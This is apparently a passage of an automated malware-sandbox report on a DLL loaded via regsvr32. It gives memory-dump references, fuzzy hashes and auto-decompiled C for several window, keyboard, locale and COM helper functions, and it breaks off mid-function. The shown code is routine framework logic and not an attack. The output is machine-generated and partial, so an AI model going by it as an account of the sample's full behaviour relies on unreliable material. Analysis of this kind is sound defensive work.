Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
Instruction ID: 324d8c50e8d3a31438fcbe536bc8f42647220ee4f3c1b4a0b0b6bd8788a7670d
Opcode Fuzzy Hash: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
Instruction Fuzzy Hash: 06114975A00208FFDB11DFA4CD85F8EBBF9EB49359F2041A9E604EA251D7709A40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10071CA2 Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10071CA2() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E1004763E(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x10071ca8
0x10071caf
0x10071cb3
0x10071ccf
0x10071cf0
0x10071cf6
0x10071cd1
0x10071cd1
0x10071cd6
0x10071cd9
0x00000000
0x10071cdb
0x10071cdb
0x10071ce1
0x10071ce2
0x10071ce6
0x10071ce8
0x10071cee
0x00000000
0x00000000
0x10071cee
0x10071cd9
0x10071d06

APIs

GetThreadLocale.KERNEL32 ref: 10071CB5
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10071CC7
GetACP.KERNEL32 ref: 10071CF0

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
Instruction ID: 0c1d45a3c1da8539fc3e6f26400fbfc8b185508d0e900761260806733794f503
Opcode Fuzzy Hash: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
Instruction Fuzzy Hash: 83F0FC31E002785BE711CFB889556EF77F9EB05B81B1141ADED81E7280DA246E05C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 100111D8 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E100111D8(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(L10010FF9() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1001118C( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100bda1c(_a4, _a8);
			}

0x100111e5
0x100111f9
0x1001120d
0x10011225
0x1001120f
0x10011216
0x10011216
0x1001122d
0x00000000
0x1001122f
0x00000000
0x10011236
0x1001122d
0x00000000
0x100111fb
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
Instruction ID: bf5f36a609a064637400546775cda49811221ced84bcc128ce8e713489aa1330
Opcode Fuzzy Hash: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
Instruction Fuzzy Hash: 41F03735604119BADF09EF60CC48EEE7BA9FB19280B008021FC65DA060EB34DAA59B52

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1A1 Relevance: 4.5, APIs: 3, Instructions: 27
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A1A1(intOrPtr _a4) {
				intOrPtr _t6;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xe) & 0x00004000) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x1001a1a1
0x1001a1ad
0x00000000
0x1001a1de
0x00000000
0x1001a1e0

APIs

GetKeyState.USER32(00000010), ref: 1001A1C5
GetKeyState.USER32(00000011), ref: 1001A1CE
GetKeyState.USER32(00000012), ref: 1001A1D7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
Instruction ID: 3e4df28d84f45c7815f7d19b03e5f5ad91f76c43e7f59ed5851f542e4bc015ed
Opcode Fuzzy Hash: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
Instruction Fuzzy Hash: 0DE01235985296BED742D7509D00BD569D0DB027D0F168465DD44AE055C7B0CBC296A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000A5B9 Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E1000A5B9(void* __ecx, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t19;
				char* _t24;
				intOrPtr* _t25;
				intOrPtr _t29;
				char _t37;

				_t37 = 0;
				if(_a4 != 0) {
					_t19 = E1000A552(__ecx, _a4);
					_v12 = _t19;
					if(_t19 != 0) {
						_push( &_v16);
						_push(_t19);
						if( *((intOrPtr*)( *_t19 + 0x58))() == 0 && _v16 == 2) {
							_t24 =  &_v8;
							_v8 = 0;
							__imp__CreateBindCtx(0, _t24);
							if(_t24 == 0) {
								_t25 = _v12;
								_push( &_a4);
								_push(0);
								_push(_v8);
								_a4 = 0;
								_push(_t25);
								if( *((intOrPtr*)( *_t25 + 0x50))() == 0 && _a4 != 0) {
									_t29 = E100483AC(_a4);
									_t37 = _t29;
									__imp__CoTaskMemFree(_a4);
								}
								L10020F7B( &_v8);
							}
						}
						L10020F7B( &_v12);
					}
					return _t37;
				}
				return 0;
			}

0x1000a5c0
0x1000a5c5
0x1000a5ce
0x1000a5d5
0x1000a5d8
0x1000a5df
0x1000a5e0
0x1000a5e6
0x1000a5ee
0x1000a5f3
0x1000a5f6
0x1000a5fe
0x1000a600
0x1000a606
0x1000a607
0x1000a608
0x1000a60b
0x1000a610
0x1000a616
0x1000a620
0x1000a629
0x1000a62b
0x1000a62b
0x1000a635
0x1000a635
0x1000a5fe
0x1000a63e
0x1000a63e
0x00000000
0x1000a643
0x00000000

APIs

CreateBindCtx.OLE32(00000000,?), ref: 1000A5F6
CoTaskMemFree.OLE32(?), ref: 1000A62B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: BindCreateFreeTask
String ID:
API String ID: 2063283046-0
Opcode ID: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
Instruction ID: 1e78cc75a8ae20b8c396a98d8a74b0a269190828820633218b219b22c11026c8
Opcode Fuzzy Hash: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
Instruction Fuzzy Hash: D2115A7590021AFFEF10DFA0C8889DE7BB9EF466C5B148269F801DA114E731DB86DB90

Uniqueness

Uniqueness Score: -1.00%

Function 100422FA Relevance: 3.0, APIs: 2, Instructions: 40
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100422FA(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __ebp;
				void* _t12;
				signed short _t15;
				void* _t20;
				void* _t21;

				_t20 = __ecx;
				_t15 = E100177F8(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000100) == 0)) {
					L6:
					return E10035C9E(_t15, _t20, _t21, _a4, _a8);
				}
				_t12 = E1001593A(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}

0x10042300
0x10042307
0x1004230b
0x1004234c
0x00000000
0x10042354
0x10042343
0x1004234a
0x00000000
0x00000000
0x1004235d

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

GetKeyState.USER32(00000073), ref: 10042324
GetKeyState.USER32(00000012), ref: 1004232D

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
Instruction ID: 2818fe949eeaa3fada07e33bb7dd25add78df246c4191234671a53c1d3373df7
Opcode Fuzzy Hash: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
Instruction Fuzzy Hash: 0FF0243A30024A7AEB11BE55CC40F9E3B78DF40AE5F514071FD08CA1A2CA3ADE5292A4

Uniqueness

Uniqueness Score: -1.00%

Function 1001643C Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1001643C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1004764D(0x1008eace, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E10015E0B(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E10013FEA(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								L10012889(_t225 - 0x14, _t222, 7);
								_t194 = 0x100bc218 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E10011C60();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													L100128B8(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E10011C60();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										L100128B8(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10016954))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(L1000CCCE(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = L100128F2(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E10014011(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E10021462(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = L10014A18(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = L1000CD56(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E1001E527(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = L1000CCCE(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E10013FEA(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												L100128B8(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									L100128B8(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								L100128B8(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E10015E81(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
